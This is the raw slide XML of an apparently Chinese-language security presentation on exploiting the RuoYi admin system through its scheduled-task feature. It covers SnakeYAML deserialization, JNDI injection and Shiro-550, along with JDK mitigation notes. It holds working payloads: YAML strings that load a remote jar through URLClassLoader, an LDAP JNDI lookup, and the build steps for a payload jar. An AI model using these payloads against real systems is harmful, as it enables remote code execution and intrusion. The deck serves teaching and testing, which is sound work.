                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>@Component</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>@Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。调用目标字符串：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ryTask.ryParams('ry')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea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0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>类调用示例：添加类和方法指定包即可。调用目标字符串：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>com.ruoyi.quartz.task.RyTask.ryParams('ry')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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定时任务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原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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825" y="1241425"/>
            <a:ext cx="8642350" cy="437515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定时任务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原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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4370" y="1824990"/>
            <a:ext cx="6680835" cy="48139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65150" y="13144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前后分离版：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.8.8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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定时任务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SnakeYAML反序列化</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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99770" y="1228725"/>
            <a:ext cx="10242550" cy="2997200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SnakeYAML反序列化是指使用SnakeYAML库将YAML格式的数据转换为Java对象的过程。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>YAML数据中的!!用于指定Java对象的全类名，这与Fastjson中的@type有相似之处。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>!!User {name: "ljl", age: 18}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SnakeYAML的反序列化功能也可能导致安全漏洞。如果攻击者能够控制YAML数据，他们可以构造恶意的YAML数据来利用这些漏洞。例如，通过指定javax.script.ScriptEngineManager类，攻击者可以触发远程代码执行：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>String context = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://fnsdae.dnslog.cn\"]]]]";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Yaml yaml = new Yaml();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>yaml.load(context);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin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650" y="4816475"/>
            <a:ext cx="4394200" cy="12001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862320" y="5397500"/>
            <a:ext cx="5752465" cy="8299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latinLnBrk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0" i="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://127.0.0.1:9999/snake-yaml.jar"]]]]'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="A31515"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="dow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150" y="4738370"/>
            <a:ext cx="659130" cy="6591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330950" y="4448175"/>
            <a:ext cx="2349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Payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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p:transition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定时任务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SnakeYAML反序列化</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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99770" y="1444625"/>
            <a:ext cx="10242550" cy="921385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>javac src/artsploit/AwesomeScriptEngineFactory.java　　　　//编译java文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>jar -cvf yaml-payload.jar -C src/ .　　//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>jar'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin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775" y="2209800"/>
            <a:ext cx="4400550" cy="425450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定时任务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>jndi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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99770" y="1318260"/>
            <a:ext cx="10242550" cy="800735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l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+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JNDI 注入，即当开发者在定义 JNDI 接口初始化时，lookup() 方法的参数可控，攻击者就可以将恶意的 url 传入参数远程加载恶意载荷，造成注入攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs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00370" y="5932805"/>
            <a:ext cx="6419215" cy="488315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 algn="l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+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>javax.naming.InitialContext.lookup('ldap://127.0.0.1:8085/calc')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="dow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14135" y="5273675"/>
            <a:ext cx="659130" cy="6591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165850" y="4905375"/>
            <a:ext cx="2349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Payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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65150" y="2468245"/>
            <a:ext cx="10706100" cy="20878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b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JDK版本与防御 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1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JDK 6u45、7u21之后：java.rmi.server.useCodebaseOnly的默认值被设置为true，禁用自动加载远程类文件，增加了RMI ClassLoader的安全性  。 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JDK 6u141、7u131、8u121之后：增加了com.sun.jndi.rmi.object.trustURLCodebase选项，默认为false，禁止RMI和CORBA协议使用远程codebase的选项  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JDK 6u211、7u201、8u191之后：增加了com.sun.jndi.ldap.object.trustURLCodebase选项，默认为false，禁止LDAP协议使用远程codebase的选项  。</a:t>
            </a:r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基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息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41960" y="1223645"/>
            <a:ext cx="11031220" cy="836295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
              <a:latin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845" y="2776855"/>
            <a:ext cx="11525250" cy="36766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41960" y="1300480"/>
            <a:ext cx="10186670" cy="759460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="40485B"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RuoYi 是一个后台管理系统，基于经典技术组合（Spring Boot、Apache Shiro、MyBatis、Thymeleaf）。主要目的让开发者注重专注业务，降低技术难度，从而节省人力成本，缩短项目周期，提高软件安全质量。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="40485B"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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定时任务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>jndi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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1185" y="2124075"/>
            <a:ext cx="8192135" cy="300418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12800" y="14287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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>yakit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开启反连</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器</a:t>
            </a:r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定时任务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>jndi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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26300" y="1603375"/>
            <a:ext cx="4267200" cy="42481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50" y="1841500"/>
            <a:ext cx="5542280" cy="302895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shiro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反序列化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55015" y="1461135"/>
            <a:ext cx="10686415" cy="1809750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Shiro 550 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是指 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Apache Shiro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>框架中的一个反序列化漏洞，编号为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CVE-2016-4437</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。这个漏洞主要涉及到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Shiro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>框架提供的记住密码功能（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RememberMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）。当用户登录并勾选了“记住我”选项时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Shiro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>会生成一个加密并编码的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。服务端在处理这个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时，会先进行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Base64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解码，然后使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解密，最后进行反序列化。问题在于，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Shiro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在某些版本中使用了硬编码的默认密钥来进行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加密，这使得攻击者可以构造恶意的序列化对象，通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加密和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Base64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码后，作为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>rememberMe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字段内容发送给服务端。服务端在反序列化时，可能会执行恶意代码，导致远程代码执行（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="060607"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="060607"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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894205" y="4010025"/>
          <a:ext cx="97155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1" imgW="971550" imgH="952500" progId="Package">
                  <p:embed/>
